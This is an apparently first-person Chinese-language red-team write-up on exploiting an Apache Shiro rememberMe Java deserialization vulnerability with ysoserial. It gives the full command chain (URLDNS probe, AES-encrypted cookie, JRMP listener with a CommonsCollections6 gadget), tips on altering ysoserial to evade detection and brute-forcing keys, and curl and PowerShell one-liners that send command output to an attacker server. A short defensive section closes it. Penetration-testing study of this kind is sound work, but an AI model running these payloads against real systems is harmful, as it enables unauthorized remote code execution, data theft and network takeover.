)
从ysoserial到实战:一次完整的Java反序列化漏洞利用复盘
在渗透测试领域,Java反序列化漏洞一直是攻击者最青睐的攻击向量之一。这种漏洞之所以危险,是因为它往往存在于应用的核心组件中,且利用门槛相对较低。记得去年在一次红队演练中,我遇到一个看似普通的Java Web应用,最终却通过反序列化漏洞拿下了整个内网权限。本文将还原那次实战过程,重点分享从漏洞发现到完整利用的每个技术细节。
1. 环境准备与工具链搭建
工欲善其事,必先利其器。在开始漏洞利用前,需要准备以下工具和环境:
- ysoserial:主攻Java反序列化的瑞士军刀,支持多种payload生成
- Burp Suite Professional:必备的渗透测试工具,特别是Collaborator功能
- Java 8+开发环境:建议使用与目标相近的JDK版本
- Shiro反序列化利用工具:用于加密payload的特殊工具
安装ysoserial最简单的方式是直接克隆GitHub仓库并编译:
git clone https://github.com/frohoff/ysoserial.git cd ysoserial mvn clean package -DskipTests提示:在实际渗透中,建议对ysoserial进行定制化修改以避免特征检测。常见的修改包括更改类名、添加垃圾代码等。
Burp Collaborator的配置往往被初学者忽视,但它对漏洞验证至关重要。在Burp Suite中:
- 进入"Burp" → "Collaborator client"
- 点击"Copy to clipboard"获取 Collaborator 域名
- 保持Collaborator客户端运行状态
2. 漏洞发现与初步验证
发现Shiro反序列化漏洞通常从识别rememberMe cookie开始。在Burp中拦截登录请求时,如果响应中包含如下Set-Cookie头部,就可能存在漏洞:
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT验证漏洞存在与否的黄金法则是使用URLDNS payload。这个payload的优势是:
- 不依赖特定第三方库
- 仅触发DNS查询,不执行命令
- 几乎不会对目标造成影响
生成payload的命令如下:
java -jar ysoserial.jar URLDNS "http://your-subdomain.burpcollaborator.net" > urldns.ser接下来需要使用Shiro专用工具对payload进行AES加密:
java -jar shiro-exp.jar encrypt urldns.ser将输出的rememberMe值替换到请求Cookie中发送。如果Burp Collaborator收到DNS查询,就确认漏洞存在。
3. 深入利用:从验证到RCE
确认漏洞后,真正的挑战是获取远程代码执行(RCE)。这里需要分阶段进行:
3.1 JRMP监听器搭建
在公网服务器上启动JRMP监听器是常见手法。以下命令会在端口1099启动监听,使用CommonsCollections6链执行命令:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "ping your-subdomain.burpcollaborator.net"注意:选择正确的gadget链至关重要。CommonsCollections6在大多数环境下可用,但有时需要尝试其他链如CommonsCollections1、3等。
3.2 生成JRMPClient payload
接着生成指向我们监听器的序列化payload:
java -jar ysoserial.jar JRMPClient "your-server-ip:1099" > jrmp.ser同样需要加密这个payload:
java -jar shiro-exp.jar encrypt jrmp.ser3.3 触发漏洞
将加密后的payload作为rememberMe cookie发送。成功时会发生以下链式反应:
- 目标服务器反序列化JRMPClient payload
- 服务器尝试连接我们的JRMP监听器
- 监听器返回恶意序列化对象
- 目标服务器再次反序列化,执行预设命令
如果一切顺利,Burp Collaborator会收到DNS或HTTP请求,确认命令执行成功。
4. 实战中的疑难排解
在实际渗透中,很少有一次成功的案例。以下是常见问题及解决方案:
问题1:Collaborator收到DNS查询但无命令执行
可能原因:
- 目标缺少相应的gadget链依赖
- 网络防火墙阻止了JRMP连接
- Shiro版本较新,密钥已变更
解决方案表:
| 现象 | 可能原因 | 验证方法 | 解决方案 |
|---|---|---|---|
| 有DNS无RCE | 依赖缺失 | 检查目标lib目录 | 尝试不同gadget链 |
| 完全无响应 | 密钥错误 | 测试多个常见密钥 | 暴力破解密钥 |
| 间歇性成功 | 网络限制 | 尝试不同端口 | 使用HTTP协议代替JRMP |
问题2:命令执行但无回显
这时需要构造带外(OOB)数据外传。例如:
curl http://your-server-ip:8080/$(whoami | base64)或者在Windows系统上:
powershell -c "Invoke-WebRequest -Uri http://your-server-ip:8080/$(whoami)"5. 防御建议与检测方法
了解了攻击手法后,如何防御这类漏洞同样重要。以下是一些有效的防护措施:
- 升级Shiro:确保使用最新版本,官方已修复已知反序列化问题
- 更换默认密钥:修改Shiro的AES加密密钥,防止攻击者使用常见密钥
- 输入过滤:对rememberMe cookie进行严格验证
- JEP 290:在Java环境中启用序列化过滤器
检测系统是否 vulnerable 的简单方法:
// 示例检测代码片段 try { ObjectInputStream ois = new ObjectInputStream(inputStream); ois.readObject(); // 如果代码执行到这里,说明反序列化未被过滤 logger.warn("Unsafe deserialization enabled!"); } catch (Exception e) { // 安全配置会抛出异常 }在一次真实的渗透测试中,正是通过这种反序列化漏洞,我从一个边缘系统逐步深入,最终获得了整个网络的控制权。整个过程耗时约3天,其中大部分时间花在各种异常情况的排查上。记得在最后阶段,目标系统使用了自定义的类加载器,导致标准payload失效。通过分析目标应用的lib目录,发现了一个冷门的XML解析库,最终利用其特性构造了特殊的gadget链才取得成功。
